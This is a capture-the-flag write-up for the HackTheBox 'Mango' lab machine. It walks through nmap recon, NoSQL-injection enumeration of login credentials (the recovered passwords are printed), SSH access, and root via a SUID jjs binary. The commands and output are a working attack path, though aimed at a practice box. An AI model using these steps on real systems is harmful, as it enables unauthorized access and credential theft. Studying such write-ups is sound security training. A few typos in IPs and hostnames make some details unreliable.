Todays writeup is on Mango, a medium Linux box released on October 26th 2019 on HackTheBox.
If you have a VIP access on the website, you can access it here : https://www.hackthebox.eu/home/machines/profile/214
Recon
Using nmap, we look for open ports.
nmap -A -p- -T4 10.10.10.162We are using basic nmap arguments here :
- -A : enables OS detection (-O), version scanning (-sV), script scanning (-sC) and traceroute (--traceroute)
- -p- : nmap scans every port
- -T4 : allows you to ajust the Timing Template (according to your bandwith, and the speed you're seeking)
The results are as following :
┌─|Log_s [18:31] :~
└──╼ $ nmap -A -p- -T4 10.10.10.162
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-03 18:31 CEST
Nmap scan report for 10.10.10.162
Host is up (0.10s latency).
Not shown: 65351 closed ports, 181 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a8:8f:d9:6f:a6:e4:ee:56:e3:ef:54:54:6d:56:0c:f5 (RSA)
| 256 6a:1c:ba:89:1e:b0:57:2f:fe:63:e1:61:72:89:b4:cf (ECDSA)
|_ 256 90:70:fb:6f:38:ae:dc:3b:0b:31:68:64:b0:4e:7d:c9 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 403 Forbidden
443/tcp open ssl/http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Mango | Search Base
| ssl-cert: Subject: commonName=staging-order.mango.htb/organizationName=Mango Prv Ltd./stateOrProvinceName=None/countryName=IN
| Not valid before: 2019-09-27T14:21:19
|_Not valid after: 2020-09-26T14:21:19
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 885.64 secondsThere are no outstanding services. We have common SSH and HTTP(S) services running on common ports.
Next step of recon is to take a look at it in a web browser.
On port 80, we get a Forbidden error. According to our scan, next one to try out is port 443 by typing the following request in the search bar.
10.10.10.163:443
Now things get interesting. We know ourselfs in a safe environment, but let's check the certificate anyway.
We have a subdomain : "stagin-order.mango.htb". Lets add it to our /etc/hosts file
echo 10.10.10.162 mango.htb staging-order.mango.htb >> /etc/hostsNow let's see what is going on, by navigating to the subdomain.
We got ourselfs a nice connection form. That's about it for the recon on this box
Own User
For the first part, the boxe's name, and the picture on the connection form are big hints. There is a high probability that the database handling credentials is based on MangoDB.
After a few researches we find an enumeration based exploit on mangoDB, that enumerates usernames and passwords : https://github.com/an0nlk/Nosql-MongoDB-injection-username-password-enumeration
We try to use the example command given in the README file, and it works.
─|Log_s [19:25] :~
└──╼ $ python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep username -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)
Pattern found that starts with 'a'
Pattern found: ad
Pattern found: adm
Pattern found: admi
Pattern found: admin
username found: admin
Pattern found that starts with 'm'
Pattern found: ma
Pattern found: man
Pattern found: mang
Pattern found: mango
username found: mangoWe do the same for the passwords by slightly changing the command to
─|Log_s [19:25] :~
└──╼ $python nosqli-user-pass-enum.py -u http://staging-order.mango.htb -up username -pp password -ep password -op login:login,submit:submit
Warning: No method given. Using POST as the method. (You can give the method with -m)
Pattern found that starts with 'h'
Pattern found: h3
Pattern found: h3m
Pattern found: h3mX
Pattern found: h3mXK
Pattern found: h3mXK8
Pattern found: h3mXK8R
Pattern found: h3mXK8Rh
Pattern found: h3mXK8RhU
Pattern found: h3mXK8RhU~
Pattern found: h3mXK8RhU~f
Pattern found: h3mXK8RhU~f{
Pattern found: h3mXK8RhU~f{]
Pattern found: h3mXK8RhU~f{]f
Pattern found: h3mXK8RhU~f{]f5
Pattern found: h3mXK8RhU~f{]f5H
password found: h3mXK8RhU~f{]f5H
Pattern found that starts with 't'
Pattern found: t9
Pattern found: t9K
Pattern found: t9Kc
Pattern found: t9KcS
Pattern found: t9KcS3
Pattern found: t9KcS3>
Pattern found: t9KcS3>!
Pattern found: t9KcS3>!0
Pattern found: t9KcS3>!0B
Pattern found: t9KcS3>!0B#
Pattern found: t9KcS3>!0B#2
password found: t9KcS3>!0B#2We now got 2 usernames admin and mango, and two passwords, h3mXK8RhU~f{]f5H and t9KcS3>!0B#2.
Now trying to ssh using those credentials. We are unable to connect with admin, but mango works !
─|Log_s [19:25] :~
└──╼ $ ssh mango@10.10.10.162
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Apr 17 14:36:00 UTC 2020
System load: 0.21 Processes: 116
Usage of /: 26.0% of 19.56GB Users logged in: 1
Memory usage: 12% IP address for ens33: 10.10.10.162
Swap usage: 4%
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 17 14:21:31 2020 from 10.10.14.205
mango@mango:~$ Unfortunately, the user.txt file is located in /home/admin. But that's not a problem, given we have the required credentials.
mango@mango:~$ su admin
Password :
$ whoami
admin
$Now a simple
cat /home/admin/user.txtand the flag appears us.
Privesc (Own Root)
For the second part, we start with the well know enumeration script LinEnum.sh, and find an interesting file with SUID that we can exploit.
[+] Possibly intersting SUID files:
-rwsr-sr-- 1 root admin 10352 Jul 18 18:21 /usr/lib/jvm/java-11-openjdk-adm64/bin/jjsAfter looking up jjs, it appears to be a binary invoking the Nashorn engine, a JavaScript engine. In other words, it allows us to execute JavaScript commands in our terminal. But the interesting part here, is that we do so with root privilege.
There are two ways of solving this, first, use the JavaScript prompt to load the content of /root/root.txt in a buffer and print it character by character.
The other way (I suck at JS), is to run the binary with the file path as argument, to trigger an error. The error message will probably display the flag, as it can't interpret the content of the file as JS instructions.
$ /usr/lib/jvm/java-11-openjdk-adm64/bin/jjs /root/root.txtAnd here is our root flag !
Thanks for reading, see you for a another writeup 😉